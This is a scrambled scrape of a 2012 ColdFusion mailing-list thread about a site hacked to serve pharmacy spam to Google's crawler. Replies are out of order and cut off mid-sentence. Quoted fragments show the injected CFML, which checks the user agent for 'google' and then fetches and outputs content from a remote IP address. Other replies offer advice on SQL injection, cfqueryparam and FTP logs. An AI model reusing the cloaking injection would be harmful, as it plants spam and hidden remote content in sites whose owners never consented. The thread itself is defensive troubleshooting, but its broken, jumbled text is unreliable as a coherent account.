> ...lax server security. We've got a boatload of stuff on this site
> to prevent SQL injection, including Justin D. Scott's application
> script, carefully checking anything that goes into the database, ...
I haven't looked at the rest of the thread yet, but I would note that
the script I wrote i
> Everything is "paramed" to the hilt - I sanitize all form vars BEFORE
> the query, and then use cfqueryparam on top of that ... so I'm guessing
> we're looking at an FTP vulnerability.
What about URL, CGI and Cookie scopes? All of those can cause the same problems.
> Question though - how could an
> I think it sounds like one developer was trying to destroy your search
> ranking by giving googlebot an obvious spam page. (don't they know
> about robots.txt?) Too bad for you guys, Google now makes a web browser,
> and thus your problem. No standard exploit will inject CFML into a page
> u
Firstly, you should try to determine when the hack was done.
Check the last modified date of the file in question (unless you have
already edited it since).
Then ask your host to check the FTP logs for that date and see if anyone
accessed that file on that date; this will rule out FTP as the cause.
Just to put the record straight it is entirely possible to create files
using SQL scripts if permissions allow it.
That SQL Injection was possible was demonstrated to Allaire by putting a
file in the C:\ directory of their main production website using SQL
Injection... :-)
On 14/11/2012 8:47
I've seen something like this on a shared server that was running
osCommerce. The uploads directory had the wrong permissions set, the
attacker uploaded a server admin script that could set permissions on other
directories. They were then able to inject code into every index.php,
index.html, index
>Recently a site of ours got hacked - basically, a Google search for the site
>was returning viagra info!
>What we got was a small script added to the end of a functions.cfm file:
>
>"google", REQUEST.UserAgent )) >
>url="http://168.16.228.250/fms/";>#cfhttp.filecontent#
>
>I'm not the server admin f
I think it sounds like one developer was trying to destroy your search
ranking by giving googlebot an obvious spam page. (don't they know
about robots.txt?) Too bad for you guys, Google now makes a web browser,
and thus your problem. No standard exploit will inject CFML into a page
unless you'
It doesn't have to have queries on it. Does it output data?
That said, it sounds like some other sort of exploit.
On Tue, Nov 13, 2012 at 3:30 PM, Les Mizzell wrote:
>
> Issues like this are typically caused by either SQL injection (i.e.
> didn't use cfqueryparam) or some sort of FTP vulnerability. My first step
> would be to make sure that *every* cfquery that accepts any input of any
> kind from users is utilizing cfqueryparam.
Everything is "paramed" to
LOL. Wow. That's a very funny script! Not funny that it happened to you, of
course, but that's just awesome.
Issues like this are typically caused by either SQL injection (i.e. didn't
use cfqueryparam) or some sort of FTP vulnerability. My first step would be
to make sure that *every* cfquery tha
Recently a site of ours got hacked - basically, a Google search for the site
was returning viagra info!
What we got was a small script added to the end of a functions.cfm file:
http://168.16.228.250/fms/";>#cfhttp.filecontent#
I'm not the server admin for this site, so they're sorta pointing the